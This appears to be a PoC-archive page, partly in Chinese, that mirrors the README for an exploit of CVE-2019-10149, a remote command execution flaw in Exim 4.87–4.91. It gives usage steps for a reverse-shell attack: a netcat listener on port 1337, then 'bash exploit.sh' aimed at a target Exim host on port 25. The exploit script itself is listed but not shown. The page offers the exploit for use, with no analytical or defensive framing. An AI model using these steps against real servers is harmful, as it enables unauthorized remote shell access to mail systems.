关联漏洞
描述
Remote Command Execution into shell from a vulnerable exim service.
介绍
# About
Remote Command Execution into shell from a vulnerable exim service. <br>
Vulnerable versions go from 4.87 to 4.91 (inclusive). Check https://nvd.nist.gov/vuln/detail/cve-2019-10149. <br>
The following script is based on Qualys PoC. Check https://packetstormsecurity.com/files/153218/Exim-4.9.1-Remote-Command-Execution.html.
### Example
2 terminals recommended
```
T1 $ nc -nlvp 1337
T2 $ bash exploit.sh
$ Listener IP: 192.168.0.1
$ Listener Port: 1337
$ Exim IP: 10.10.0.1
$ Exim Port: 25
```
文件快照
[4.0K] /data/pocs/053e8add10a4287f1684cd82572db5c46892e349
├── [ 618] exploit.sh
└── [ 520] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。